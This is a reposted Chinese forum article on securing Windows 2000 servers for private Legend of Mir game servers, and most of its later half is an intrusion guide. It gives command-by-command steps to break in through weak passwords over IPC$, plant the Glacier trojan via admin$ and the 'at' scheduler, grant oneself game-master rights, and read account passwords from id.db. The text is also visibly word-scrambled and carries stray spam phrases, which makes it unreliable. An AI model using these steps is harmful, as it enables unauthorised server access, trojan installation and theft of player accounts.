体系属性>
作者:admin 日期:2011/12/08 18:09 人气:
内容转贴收集于网络,在此感激原作者及媒体
后面有4F地一些资料,不是教你去攻击别人,而是教你如何保护自己安全哈
Windows2000 含有很多滴安全功能和选项,如果你公道地配置它们,那么windows 2000将会是一堆很安全滴操作系统..
初级安全篇
1.物理安全
服务器应该安置在安装得监视器哒隔离房间内,并且监督器要保存15天以上哒摄像记载.另外,机箱,键盘,电脑桌抽屉要上锁,以确保旁人即便进入房间也无法使用电脑,钥匙要放在另外哒安全滴处所.
2.停掉Guest 帐号
在计算机管理地用户里面把guest帐号停用掉,任何时候都不许可guest帐号登陆系统.为鸟保险起见,最好给guest 加一堆复杂滴密码,你可以打开记事本,在里面输入一串包含特别字符,数字,字母得长字符串,然后把它作为guest帐号地密码拷进去.
3.限制不必要哒用户数目
去掉所有哒duplicate user 帐户, 测试用帐户, 共享帐号,普通部分帐号等等.用户组策略设置相应权限,并且常常检讨系统滴帐户,删除已经不在使用滴帐户.这些帐户很多时候都是黑客们入侵系统滴冲破口,系统得帐户越多,黑客们得到正当用户得权限可能性普通也就越大.海内滴nt/2000主机,如果系统帐户超过10个,正常都能找出一两个弱口令帐户.俺曾经发现一台主机197个帐户中居然有180个帐号都是弱口令帐户.
4.创建2个管理员用帐号
虽然这点看上去和上面这点有些抵触,但事实上是遵从上面哒规矩地. 创建一些个别权限帐号用来收信以及处置一些*常事物,另一些领有Administrators 权限哒帐户只在需要得时候使用.可以让管理员使用 " RunAS" 命令来执行一些需要特权能力作滴一些工作,以便利管理.
5.把体系administrator帐号改名
大家都晓得,windows 2000 哒administrator帐号是不能被停用滴,这象征着别人可以一遍又一边地尝试这个帐户地密码.把Administrator帐户改名可以有效得预防这一点.当然,请不要使用Admin之类滴名字,改啦即是没改,尽量把它假装成一般用户,比如改成:guestone .
6.创建一些陷阱帐号
什么是陷阱帐号? Look...>创建一些名为" Administrator"哒本地帐户,把它滴权限设置成最低,什么事也干不咯得那种,并且加上一批超过10位地超级复杂密码.这样可以让那些 Scripts s忙上一段时间啦,并且可以借此发现它们滴入侵打算.或者在它得login scripts上面做点四肢.嘿嘿,够损!!
7.把共享文件地权限从"everyone"组改成"受权用户"
"everyone" 在win2000中意味着任何有权进入你地网络滴用户都能够取得这些共享资料.任何时候都不要把共享文件地用户设置成"everyone"组.包含打印共享,默认得属性就是"everyone"组地,一定不要忘拉改.
8.使用安全密码
一堆好地密码对一批网络是十分主要哒,然而它是最轻易被疏忽哒.前面滴所讲哒兴许已经能够阐明这一点鸟.一些公司地管理员创立帐号地时候往往用公司名,盘算机名,或者一些别哒一猜就到滴货色做用户名,而后又把这些帐户得密码设置得N简略,比方 "welcome" "iloveyou" "letmein"或者和用户名相等同等.这样滴帐户应当请求用户首此登陆滴时候更改成庞杂滴密码,还要留神常常更改密码.前些天在IRCand人探讨这一问题哒时候,大家给好密码下得个定义:保险期内无奈破解出来哒密码就是好密码,也就是讲,我们反复推敲下人家得到拉你滴密码文档,必须花43天或者更长滴时光才干破解出来,而你哒密码策略是42天必需改密码.
9.设置屏幕保护密码
很简单也很有必要,设置屏幕保护密码也是避免内部职员损坏服务器滴一批屏障.注意不要使用OpenGL和一些复杂哒屏幕掩护程序,挥霍系统资源,让她黑屏就可以咯.还有一点,所有系统用户所使用滴机器也最好加上屏幕维护密码.
10. 使用NTFS格式分区
把服务器得所有分区都改成NTFS格局.NTFS文件系统要比FAT,FAT32滴文件系统平安得多.这点不用多讲,想必大家得服务器都已经是NTFS滴拉.
11.运行防毒软件
俺见过得Win2000/Nt服务器从来没有见到有安装拉防毒软件滴,实在这一点无比重要.一些好得杀毒软件不仅能杀掉一些有名哒病毒,还能查杀大批木马和后门程序.这样滴话,"黑客"们使用地那些著名地木马就毫无用武之地鸟.不要忘鸟常常进级病毒库
12.保障备份盘滴安全
一旦系统资料被破坏,备份盘将是你恢复资料滴唯一道路.备份完资料后,把备份盘防在安全滴地方.千万别把资料备份在统一台服务器上,那样得话,还不如不要备份.
Windows2000 含有很多哒安全功能和选项,如果你合理地配置它们,那么windows 2000将会是一些很安全得操作系统..
中级安全篇
1.开启密码密码策略
策略 设置
密码复杂性要求 启用
密码长度最小值 6位
强迫密码历史 5 次
强制密码历史 42 天2.开启帐户策略
策略 设置
复位帐户锁定计数器 20分钟
帐户锁定时间 20分钟
帐户锁定阈值 3次3.设定安全记载哒访问权限
安全记录在默认情况下是没有保护滴,把她设置成只有Administrator和系统帐户才有权访问.
4.把敏感文件寄存在另外得文件服务器中
虽然现在服务器滴硬盘容量都很大,但是你仍是应该考虑是否有必要把一些重要地用户数据(文件,数据表,名目文件等)存放在另外一批安全地服务器中,并且经常备份它们.
5.不让系统显示上次登陆地用户名
默认情形下,终端服务接入服务器时,登陆对话框中会显示上次登陆得帐户明,本地地登陆对话框也是一样.这使得别人可以很容易滴得到系统哒一些用户名,进而作密码猜想.修改注册表可以不让对话框里显示上次登陆哒用户名,详细是:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DontDisplayLastUserName
把REG_SZ 得键值改成 1 .
6.制止建破空衔接
默认情况下,任何用户通过通过空连接连上服务器,进而枚举出帐号,预测密码.偶们可以通过修改注册表来禁止建立空连接:
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 地值改成"1"即可.
7.到微软网站下载最新哒补丁程序
很多网络管理员没有访问安全站点哒习惯,甚至于一些漏洞都出拉良久鸟,还放着服务器滴漏洞不补给人家当靶子用.谁也不敢保障数百万行以上代码哒2000不出一点安全漏洞,时常访问微软和一些安全站点,下载最新地service pack和漏洞补丁,是保障服务器久长安全滴独一方法.
高级安全篇
1. 封闭 DirectDraw
这是C2级安全尺度对视频卡和内存哒要求.关闭DirectDraw可能对一些须要用到DirectX得程序有影响(比如游戏,在服务器上玩星际争霸?咋晕.但是对于绝大多数哒贸易站点都应该是不影响地. 修改注册表 HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers\DCI 滴Timeout(REG_DWORD)为0即可.
2.关闭默认共享
win2000装置好当前,系统会创建一些隐藏滴共享,你可以在cmd下打 net share 查看她们.网上有许多对于IPC入侵得文章,信任大家必定对它不生疏.要禁止这些共享 ,打开 管理工具>计算机管理>共享文件夹>共享 在相应哒共享文件夹上按右键,点结束共享即可,不过机重视新启动后,这些共享又会从新开启地.
默认共享目录 门路和功能
C$ D$ E$ 每个分区得根目录.Win2000 Pro版中,只有Administrator
和Backup Operators组成员才可连接,Win2000 Server版本
Server Operatros组也可以连接到这些共享目录
ADMIN$ %SYSTEMROOT% 远程管理用得共享目录.它得路径永远都
指向Win2000地安装路径,比如 c:\winnt
FAX$ 在Win2000 Server中,FAX$在fax客户端发传真哒时候会到.
IPC$ 空连接.IPC$共享供给得登录到系统滴才能.
NetLogon 这个共享在Windows 2000 服务器地Net Login 服务在处
理登陆域恳求时用到
PRINT$ %SYSTEMROOT%\SYSTEM32\SPOOL\DRIVERS 用户远程管理打印机
解决办法:
打开注册表编纂器.REGEDIT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
在右边建立一堆名为AutoShareServer滴DWORD键.值为0
3.禁止dump file滴发生
dump文件在系统瓦解和蓝屏哒时候是一份很有用地查找问题哒材料(不然偶就照字面意思翻译成垃圾文件咯).然而,它也可以给黑客提供一些敏感信息比如一些利用程序得密码等.要禁止它,打开 掌握面板>系统属性>高等>启动和故障恢复 把 写入调试信息 改成无.要用滴时候,可以再重新打开它.
4.使用文件加密系统EFS
Windows2000 强盛哒加密系统能够给磁盘,文件夹,文件加上一层安全保护.这样可以防止别人把你滴硬盘挂到别地机器上以读出里面滴数据.记住要给文件夹也使用EFS,而不仅仅是单个地文件. 有关EFS地具体信息可以查看
5.加密temp文件夹
一些运用程序在安装和升级哒时候,会把一些东西拷贝到temp文件夹,但是当程序升级结束或关闭得时候,1.85合击,它们并不会自己扫除temp文件夹得内容.所以,1.95皓月无内功,给temp文件夹加密可以给你哒文件多一层保护.
6.锁住注册表
在windows2000中,只有administrators和Backup Operators才有从网络上访问注册表得权限.如果你认为还不够哒话,可以进一步设定注册表访问权限,具体信息请参考:
7.关机时肃清掉页面文件
页面文件也就是调度文件,是win2000用来存储没有装入内存滴程序和数据文件局部得隐藏文件.一些第三方地程序可以把一些没有地加密滴密码存在内存中,页面文件中也可能含有另外一些敏感哒资料. 要在关机地时候明白页面文件,可以编辑注册表
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
把ClearPageFileAtShutdown滴值设置成1.
8.禁止从软盘和CD Rom启动系统
一些第三方地工具能通过领导系统来绕过原有滴安全机制.如果你哒服务器对安全要求异常高,可以考虑使用可挪动软盘和光驱.把机箱锁起来扔不失为一群好方法.
9.斟酌应用智能卡来取代密码
对于密码,老是使安全管理员进退维谷,塞进她地冲锋衣里.偶很渐愧,容易受到 10phtcrack 等工具地袭击,如果密码太复杂,用户把为啦记住密码,会把密码到处乱写.如果前提容许,用智能卡来代替复杂哒密码是一堆很好地解决方法.
10.考虑使用IPSec
正如其名字得含义,IPSec 提供 IP 数据包得安全性.IPSec 提供身份验证、完全性和可抉择滴秘密性.发送方计算机在传输之前加密数据,而接受方计算机在收到数据之后解密数据.利用IPSec可以使得系统地安全机能大大加强
SF滴必须开放端口,极其解决端口安全得方法
传奇服务器开放端口+花生壳+一些必须端口
可以将这些端口使用TCP/IP筛选,只开放这些端口增添安全性,(开设其余服务,端口自己再加入)
TCP/IP筛选端口-> TCP断口
端口7220 .... RunGate 1 端口
端口7210 .... RunGate 2 端口 同时开启3个RunGate
端口7200 .... RunGate 3 端口
端口7100
端口7012
端口6000
端口5600
端口5500
端口5100
端口5000
端口4900
端口3389
端口3372
端口3100
端口3000
端口1027
端口1025
端口0135
\system32\drivers\etc\services 文件中有著名端口和服务滴对比表可供参考.具体方法为:
网上街坊>属性>本地连接>属性>internet 协议(tcp/ip)>属性>高级>选项>tcp/ip筛选>属性 打开tcp/ip筛选,增加需要滴tcp,协定即可.
偶开咯3个RunGate端口,解决多个玩家同时登陆访问时会涌现7200过错而使服务器突然狂卡,开3个后果比拟好.是*(ggggg7原创)
开3个RunGate端口哒方法:
RunGate文件夹再复制2份 分辨为RunGate1,RunGate2,RunGate3 将里面得Mirgate.ini分离改为GatePort=7200,GatePort=7210,GatePort=7220
DBSrv200文件夹下哒!!serverinfo.txt改为127.0.0.1 127.0.0.1 7200 127.0.0.1 7210 127.0.0.1 7220
Mir200文件夹下地!!servertable.txt改为
1 127.0.0.1 7200
2 127.0.0.1 7210
3 127.0.0.1 7220
然后运行RunGate1,RunGate2,RunGate3 下滴3个RunGate.exe
M2Server会提醒:
Gate 0 opened
Gate 1 opened
Gate 2 opened
恰当哒加点防火墙会更好
私服得攻与防
自己崇尚私服技巧...热忱研究私服...为营造一堆好滴游戏气氛而独特尽力过!!
前几*,本私服也同样遭遇过黑客哒攻击...但是研究拉几回发现啦漏洞哒所在。。
下面咱先写如何入侵计算机滴,咋用滴是WINDOWS 2000 SEVER
1 X-SCAN扫描IP 看看谁是弱口令(IP也非常容易得到,私服都有,弱口令就是用户名和密码都是系统默认得,没有改.)
2 打开DOS系统 在DOS下进行*作!!
c:/>net use \\192.168.0.1\ipc$ /user:administrator 进入对方计算机USER进入哒就是管理员用户.
进入鸟以后就好办咯,可以找你要黑滴私服...做GM也好,搞破坏删除也好,比如做GM哦。。
c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出来,其余得想怎么改就凭你咯,但是咋得说明一下!!!!这段代码目得很简单就是将D盘拷贝一群传奇GM哒列表,你可以把你自己增添进去在编辑。。
c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt
这样就可以咯.这是应用弱口令进入计算机得方法......当然得还有更多哒方法.
俺在讲讲咱哒 ** 传奇得遭黑地阅历!!
首先,就是鼠标乱动,很显明就是被人控制鸟,分析如下:1,中木马,2远程控制!!
其次,有文件笼罩哒对话框,计算机被忽然重新启动!!!!剖析如下:1,破坏系统,2,对传奇得控制。3,从新启动是为咯黑客滴设置生效。
再次,有非法GM制作物品,以被查出.分析如下:是针对传奇而来!!
解决措施:用杀毒软件杀毒,最好在DOS下进行.2,是2000哒破绽太多,查找无用得端口,并关闭3389等,下载 2000 SP3 滴补丁!!在把持面板当选本地用户和组中关闭GUEST帐号!!和IUSR (计算机名)INTNERNET来宾帐号关闭(咱滴传奇就是黑客利用这个号进入计算机滴),修改超级管理员用户名与密码... 在关闭远程拜访等功效,另外,进攻传奇主要是GM列表,俺同样也中过,景象是这样地,翻开AdminList.txt文件,没有发明多哒GM,利用CTRL-A看看有没有过剩地GM,另外细心一看,在看AdminList.TXT地文件名后面有没有空格,设置文件全体显示,会发现是否多得一群隐蔽GM列表文件,这也是屡进不止哒发现有非法GM得起因.黑客进攻偶得计算机是用鸟2个小时就被咋发现咯,即时做鸟相应滴修改,恢复得传奇得正常运行,至今为止,依然有人进入俺滴来宾帐号地忠告,但是已经进不来鸟!!传奇也步入得畸形哒运行当中。
固然偶写鸟一些如何进攻和防备计算机哒方法和解决方法,偶自己也感到有点自圆其说得主意,但是俺地目标很是简单,盼望可能辅助你解决你地问题。进步本人计算机地安全
如何在别人得私服做GM
攻击低级教养
偶在侵入别人4f所使用得方法
看到有些4f做哒不错,但是进去又不是很有钱,也没设备,高手也良多,始终不爱好在里面当菜鸟滴俺,一口吻进入她们得服务器端大闹一番之后.当足啦gm地瘾,当初俺把办法颁布与大家....
其实咋所使用地方法很简单,只有4个工具:
(一):shed.exe
(二)流光2000
(三)cmd.exe (其实就是2000下得dos啦)!!
(四)冰河8.4 操作系统:win2000 server 或者winxp系统. "shed.exe":其实就是用来网上查共享资源滴,速度快,可以查到很多服务断滴共项文件,不过在这里面有些ip在阅读器中无法访问,这是因为其中也包括拉个人上网哒ip.呵呵!!一些作网站,网吗哒服务器一些目录都是共享哒,有些是可以访问,但是不能删除,因为你所访问哒都是以匿名访问滴,所以权限不够!!有些需要密码.碰到密码怎办?用流光. "流光"虽讲对202作拉限度,但是对小日本滴ip可是没有制约地,呵呵!!所以讲使用流光滴ipc探测,建立一堆空对话,查到用户列表,然后先简单探测,此时有些网管怠惰,把administrator设置滴过于简单,呵呵,你就可以抓到鸟.
下一步如何做呢?也许在你查对方滴端口时发现对方开哒端口很少,比如ftp没开,怎办呢?冰河。 "冰河",想必很多友人都玩过,使用冰河控制一台服务器速度很快,(由于服务器那边带宽很大)几分钟就可以查到对方主机滴主页所在地位.但是如何上传并且控制她呢? "cmd.exe" 是2000下地dos咯,执行cmd.exe 使用net命令,
具体操作如下:
第一步:net use \\ip\ipc$ "password" /user:"user" 解释:以一些超级用户名与你想黑地网站树立联接,1.90轻变,当然超级用户必须是该网站admin里得.这里哒"ip"就是主机咯,"password"就是超级用户滴密码,"user"就是超级用户.好比:net use \\210.248.250.2\ipc$ "maozhiie" /user:maozhijie
第二步:copy g-server.exe \\ip\admin$\system32 讲明:g-server.exe就是冰河得远程服务器端.意思:将此文件拷贝到对方地主机winnt里滴system32目录里.也许有人要问木马侵入对方那边可以觉察出来滴吗,呵呵!!装拉防火墙估量可以,不过很多主机没钱买呀。不像中国盗版满天飞。。如果你有最新滴木马也可以得!!这是最好地得!!.嘿嘿hh
第三步:net time \\ip 观察对方哒服务器时间.因为有时差,应该是一些小时额!!所以必需要以对方地服务器时间为准.
第四步:at \\ip time g-server.exe 这里滴time就是对方地主机时间.作用:在划定时间履行该程序.比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以节制该电脑鸟.这个咱就不讲啦吗,呵呵!!菜鸟也会玩滴软件.
这时咋们就可以控制服务器啦,
net use * \\ip\*$ 远程映射
看这个
mir.db里面有每个人哒数据,并且没加密得,大家可以用
access找开来改一下,改多少个极品,如0-80攻哒木剑呵,0-50魔地六角戒指之类地,那就随你哒便咯.只是这样也太烦人啦.呵呵.
比如武器,数据格式如下(全部是16进制)
ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
前面**地是物品代码,然后0xce 00 是武器代码(高位在后),和物品db数据库中对应,
例:物品数据库中屠龙是序号(idx)是205,对应到这里就是(205+1)转为16进制是ce
后面地 43 12是当前速决度,88 13是最大长久度.
例:43 12换算成十进制为17170,持久度为17
后面哒01 02 03依次是攻击、魔法、道术.
注意是在原武基本上增加.
例:上面滴屠龙显示出来是攻击:5-36,道术:0-2,魔法:0-3.
后面地04 05 06 07 08 09顺次是兵器地 荣幸、咒骂、正确、攻打速度、强度.
后面两个空位后紧跟滴0x0a是表现武器是否被修炼,详细来讲
给武器加攻击时:
修炼前:00
修炼后:0a
实验胜利后:00,攻击值增长.
对于首饰和衣服,自己研讨哦,这有好多人都知道滴哦,咱没细写.网上这方面哒文章是有滴,俺就不必多讲鸟啦?
然后到, mirserver\mud2\logsrv\iddb下
这里有个id.db所有人地帐号和密码都在鸟,你看着办吗,不外偷人家得号也不是什么光彩地事,偶是素来不做得,只是经常会拿gm哒号来reload一下.呵呵
这里,咱把你边走边看加到这个服务器地adminlist,呵呵,这里是打个比喻,这里加入你哒名字),然后,俺们到mir.db中找出gm得帐号,再到id.db中找出这个帐号滴密码.好拉,ok啦,用gm号进入游戏(进之前m一下她呵,不要让人家发现鸟,也不要改人家得密码,让人家发现鸟多不好呀,呵呵).打命令@reloadadmin.立即out啦.
然后,把你参加adminlist地人物从adminlist里删除,好啦,你进去游戏哦,你是gm啦,可是真正滴gm是不会从服务器端看到你地名字呢。。。她也许在想"这里怎么啦呵?似乎还有个gm???".呵呵,不过不要过分得,不然人家一批reload你哒权限就没啦额.
到这里大家做gm地梦就实现得,下面俺讲得就是怎么远程控制服务器主机啦,比如给她关机呵重启吖....
私服技术偶是一点都不懂.不过服务器安全方面还是略懂一二呀!!
服务器入侵重要靠哒是帐号与密码.大家要先清楚什么是系统帐号.什么是系统密码!!
其它WINDOWS每一些系统都有着她得超级管理员帐号与密码。
一但这些被黑客扫描到哒话,哪么你将会得到一群恐怕哒要挟!!
当你私服是人气高哒时候.给黑客入侵得话,哪要是万一给删拉数据.到时候.真得是惨不忍堵.
一:懂得一下帐号地含意
先运行CMD
然后输入:net user(回车健)
这样后,会显示一例帐号
再查看治理员帐号
输入:net localgroup administrators
这就是查看administrators组得用户.这样哒话若是人家用暗藏帐号滴方式也会查出来!!
系统自带地超级管理员帐号是administrator
记住这里显示出来多个帐号不明哒帐号.哪就证实你机器不安全啦.若呈现在得帐号都是你自已地帐号.哪百分之四十你机器未被入侵
帐号安全:
二:密码篇
你若觉得自已哒帐号密码是123456哪么不出三秒人家就到你机上一游拉.
修改密码方法,在DOS下修改更安全
输入net user 帐号名 需修正密码(然后回车健)
一般密码设复杂一点.
溢出:
2000服务器版装下去会主动装IIS哒,若你觉得IIS没有什么用就停止.IIS地址:开端》》程序》》管理工具》》Internet信息服务(这个就是IIS)你将她开启.上面按停滞。这样就进一步安全鸟.不过若IIS你需要用得话,哪么记得打目前最新得补丁SP4呀.
RPC溢出.大家记住,尝尝t...